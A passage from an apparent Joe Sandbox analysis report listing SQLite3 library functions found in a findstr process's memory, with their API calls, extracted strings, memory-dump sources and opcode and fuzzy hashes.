                                                                                                    • API String ID: 3250357221-1141589763
                                                                                                    • Opcode ID: b5f9ec598dea7b7a58e175c3784db65ab15ba7204a2fff13599c2690ae709099
                                                                                                    • Instruction ID: a9ab5371d3c2b894e5ec624cc879e9290638db5bf38cc2dbdcc107b68add9c7d
                                                                                                    • Opcode Fuzzy Hash: b5f9ec598dea7b7a58e175c3784db65ab15ba7204a2fff13599c2690ae709099
                                                                                                    • Instruction Fuzzy Hash: 3C112AB05087509BEB00AF68C08531ABFE4AF85B18F24C84EE8D89B345D379C855CBD6
                                                                                                    Function 61E340E5 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E340FB
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E3411E
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E3414B
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E34171
                                                                                                    • sqlite3_result_subtype.SQLITE3 ref: 61E34181
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                                                                    • String ID: J
                                                                                                    • API String ID: 3250357221-1141589763
                                                                                                    • Opcode ID: dbbfab0f1078eda5a62932de0f63c451b0be6ecb197c86ad8b508d0a9f7b99bc
                                                                                                    • Instruction ID: 3a8751ba2d59f2e51f39894632475cc41b9fd0aa382fecf7a7898c216a674033
                                                                                                    • Opcode Fuzzy Hash: dbbfab0f1078eda5a62932de0f63c451b0be6ecb197c86ad8b508d0a9f7b99bc
                                                                                                    • Instruction Fuzzy Hash: F1117CB06087509BD700AF68C58131ABFE0AF84768F24C44EE8E88B349D37AC944CB96
                                                                                                    Function 61E29A84 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28B6C: sqlite3_log.SQLITE3(?,?,?,?,?,61E28C1F), ref: 61E28BA7
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E29AB3
                                                                                                    • sqlite3_value_text16le.SQLITE3 ref: 61E29AC7
                                                                                                    • sqlite3_value_text16le.SQLITE3 ref: 61E29AF5
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E29B09
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text16le$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: library routine called out of sequence$out of memory
                                                                                                    • API String ID: 3568942437-3029887290
                                                                                                    • Opcode ID: 17b9eb7b49433d9af18b749f9056d2616b246f005f8279986dd1805f82ac9684
                                                                                                    • Instruction ID: 3dd9e2278883d49438814040e53fd1a7c112fc96c3ea8a6f698e21cf4501e52e
                                                                                                    • Opcode Fuzzy Hash: 17b9eb7b49433d9af18b749f9056d2616b246f005f8279986dd1805f82ac9684
                                                                                                    • Instruction Fuzzy Hash: F1015E75A083925BDB10AFB9C9D0A5ABBE4AF84358F69C8BDDC48CB305E771CC408791
                                                                                                    Function 61E39EC0 Relevance: 9.4, APIs: 6, Instructions: 361stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_logstrcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 2202632817-0
                                                                                                    • Opcode ID: d49bf92def8714c7f87a1cbb51c513b54f3e23fb3cc812a25893fcdb06c0d25c
                                                                                                    • Instruction ID: 8bac28c2b058e99bf104cec5d39bc63650811f4f5cfc8de139da58aab139d3da
                                                                                                    • Opcode Fuzzy Hash: d49bf92def8714c7f87a1cbb51c513b54f3e23fb3cc812a25893fcdb06c0d25c
                                                                                                    • Instruction Fuzzy Hash: 15F1D070A442699FDB04DFA9C48079DBBF1BF88308F248529E859EB364D775E886CF41
                                                                                                    Function 61E167F0 Relevance: 9.2, APIs: 6, Instructions: 219COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_msize$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 2585109301-0
                                                                                                    • Opcode ID: fd3b52063955b5430798387adb71dabf2c28f7f59be071152ac897afe705eab3
                                                                                                    • Instruction ID: e3b5f97f4ab9d1ec82d1603466d5dd0598fc2ed613b833747bf0d65009e4a861
                                                                                                    • Opcode Fuzzy Hash: fd3b52063955b5430798387adb71dabf2c28f7f59be071152ac897afe705eab3
                                                                                                    • Instruction Fuzzy Hash: 8BA123B5A042868FDB00CF69C481B9AB7F1BF89314F29C5A9EC559B309D774E851CFA0
                                                                                                    Function 61E37659 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E3767A
                                                                                                      • Part of subcall function 61E35200: sqlite3_initialize.SQLITE3 ref: 61E35206
                                                                                                      • Part of subcall function 61E35200: sqlite3_vmprintf.SQLITE3 ref: 61E35220
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E377BA
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E377C2
                                                                                                      • Part of subcall function 61E351D2: sqlite3_free.SQLITE3 ref: 61E351E1
                                                                                                      • Part of subcall function 61E351D2: sqlite3_vmprintf.SQLITE3 ref: 61E351F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_vmprintf$sqlite3_initializesqlite3_mprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 2044204354-0
                                                                                                    • Opcode ID: 1c2a324c7f83091259c27be4f7c077c1804106c38e465fbed6605bf40c304583
                                                                                                    • Instruction ID: d50cf257539348e788ea68656c6546568752399a1f9c297d18f02efa7f5aea37
                                                                                                    • Opcode Fuzzy Hash: 1c2a324c7f83091259c27be4f7c077c1804106c38e465fbed6605bf40c304583
                                                                                                    • Instruction Fuzzy Hash: 2841E474E04659DBDB01DFA9C480AAEBBF5AF89315F20C92EE859D7350EB34D802CB51
                                                                                                    Function 61E32B83 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 335COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E327FF: sqlite3_realloc64.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,61E328EE), ref: 61E3282E
                                                                                                      • Part of subcall function 61E09142: memcmp.MSVCRT ref: 61E0919C
                                                                                                      • Part of subcall function 61E09142: memcmp.MSVCRT ref: 61E09200
                                                                                                    • sqlite3_malloc64.SQLITE3 ref: 61E32D9E
                                                                                                      • Part of subcall function 61E1A7FF: sqlite3_initialize.SQLITE3 ref: 61E1A80A
                                                                                                    • memcmp.MSVCRT ref: 61E32E5E
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E32F3C
                                                                                                    • sqlite3_log.SQLITE3 ref: 61E32FED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$sqlite3_freesqlite3_initializesqlite3_logsqlite3_malloc64sqlite3_realloc64
                                                                                                    • String ID:
                                                                                                    • API String ID: 885863977-3916222277
                                                                                                    • Opcode ID: c7a47a0a3a978d7881078b673ba02d9b384dc068e8d5871ad12da2bd378eb5b1
                                                                                                    • Instruction ID: 71d31c16e7c5498feb8dac410fbecc6e3d873e5deddcbf21f14c66feeb547e20
                                                                                                    • Opcode Fuzzy Hash: c7a47a0a3a978d7881078b673ba02d9b384dc068e8d5871ad12da2bd378eb5b1
                                                                                                    • Instruction Fuzzy Hash: 90E10570E042698BDB54DFA9C98478DBBF1BF98308F208569E858EB355E774D885CF80
                                                                                                    Function 61E35AAA Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E35AC1
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E35AF0
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E35B05
                                                                                                    • sqlite3_load_extension.SQLITE3 ref: 61E35B20
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E35B3B
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E35B46
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_result_errorsqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                                    • String ID:
                                                                                                    • API String ID: 356667613-0
                                                                                                    • Opcode ID: dfd58dc9ebaf6256097c0e781b216f50ae032420fb48fbe3d64b8c6e8492f0c5
                                                                                                    • Instruction ID: b0cb48528066a7090ff18f65fa0e18564e6490bd08e55b1769881dbd3872592e
                                                                                                    • Opcode Fuzzy Hash: dfd58dc9ebaf6256097c0e781b216f50ae032420fb48fbe3d64b8c6e8492f0c5
                                                                                                    • Instruction Fuzzy Hash: 0F11E7B49087559BCB10EF69C48455AFBF0AF89364F20CA1DE8A987390D334D441CF51
                                                                                                    Function 61E6ADA7 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: invalid rootpage
                                                                                                    • API String ID: 0-1762523506
                                                                                                    • Opcode ID: bd02f04d0bc365ab9c50363e707fa58d777e2edfa58f55ef7ba3493da82e74e1
                                                                                                    • Instruction ID: 610ffb7a34ccbed7cff37b7b4ac3cd2f9bec1d9ba6192073f9528fc213e1639d
                                                                                                    • Opcode Fuzzy Hash: bd02f04d0bc365ab9c50363e707fa58d777e2edfa58f55ef7ba3493da82e74e1
                                                                                                    • Instruction Fuzzy Hash: 82416F74A843558FDB10CFA9C48075ABBF5AFC9318F64C86DE8A99B351D730E881CB91
                                                                                                    Function 61E3131D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E31339
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E31346
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E31354
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E313EF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_result_text
                                                                                                    • String ID: i
                                                                                                    • API String ID: 380805339-3865851505
                                                                                                    • Opcode ID: 0c4ecd1fc2980fa9802c7c44043fc528dfc719f59195f5150e255adfaae1991b
                                                                                                    • Instruction ID: 34715f30302f51982403a4bd1b476040fb687576226f43a491f95d6c211fce21
                                                                                                    • Opcode Fuzzy Hash: 0c4ecd1fc2980fa9802c7c44043fc528dfc719f59195f5150e255adfaae1991b
                                                                                                    • Instruction Fuzzy Hash: 0941A074E083559BCB00DFA9D98069DFBF5AF88214F24C52EE8A8E7350D774D841CB52
                                                                                                    Function 61E380AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E380D1
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E38126
                                                                                                      • Part of subcall function 61E37F9A: sqlite3_mprintf.SQLITE3 ref: 61E37FEC
                                                                                                      • Part of subcall function 61E37F9A: sqlite3_result_error.SQLITE3 ref: 61E38006
                                                                                                      • Part of subcall function 61E37F9A: sqlite3_free.SQLITE3 ref: 61E3800E
                                                                                                    • sqlite3_result_subtype.SQLITE3 ref: 61E381C5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_subtype
                                                                                                    • String ID: J$null
                                                                                                    • API String ID: 321809972-802103870
                                                                                                    • Opcode ID: 8f465e050b62c10482d958cf4a42babe55b75c73d7f44fb8f784198fc46bdb8c
                                                                                                    • Instruction ID: 22facf348c86821ebe9090002c041957e1e719a4f5c105b548af362badf8ae58
                                                                                                    • Opcode Fuzzy Hash: 8f465e050b62c10482d958cf4a42babe55b75c73d7f44fb8f784198fc46bdb8c
                                                                                                    • Instruction Fuzzy Hash: B1313D70A0426A9BDB10DF24C881B9EB7E1AFC5358F24C169E848DB341D735DA86CF81
                                                                                                    Function 61E25628 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_value_blob
                                                                                                    • String ID: la
                                                                                                    • API String ID: 3596987688-1065728030
                                                                                                    • Opcode ID: 7241eb905d1dfc9d99ee330e2cd5261d2686ae0a93b4515562b17ef3480060b3
                                                                                                    • Instruction ID: 01224ce401ee1e953deddca4b5bd68c535d711521b6eb2c53789093390a6bd60
                                                                                                    • Opcode Fuzzy Hash: 7241eb905d1dfc9d99ee330e2cd5261d2686ae0a93b4515562b17ef3480060b3
                                                                                                    • Instruction Fuzzy Hash: 0B31D3B1A087469FC700DF69C88169EBBE0AF88364F24C92EE4A9D7350D778D9418F91
                                                                                                    Function 61E2350B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E23581
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E23619
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E23639
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E23641
                                                                                                      • Part of subcall function 61E1280D: sqlite3_free.SQLITE3 ref: 61E128B3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_snprintf$sqlite3_win32_is_nt
                                                                                                    • String ID: a
                                                                                                    • API String ID: 4082161338-581836851
                                                                                                    • Opcode ID: fdb5e16049fc0b7c61876ddb340f192f6da7ef1442bedf23081475d568416464
                                                                                                    • Instruction ID: b9e181d239d4676d816906141708db1cd7c2a9d3d6bc185cdad488ee15cd9f1c
                                                                                                    • Opcode Fuzzy Hash: fdb5e16049fc0b7c61876ddb340f192f6da7ef1442bedf23081475d568416464
                                                                                                    • Instruction Fuzzy Hash: 9231AEB49083469FDB00EFA9D49474EBBF4BB89748F20C82EE89897340D778C5458F92
                                                                                                    Function 61E0BBF4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
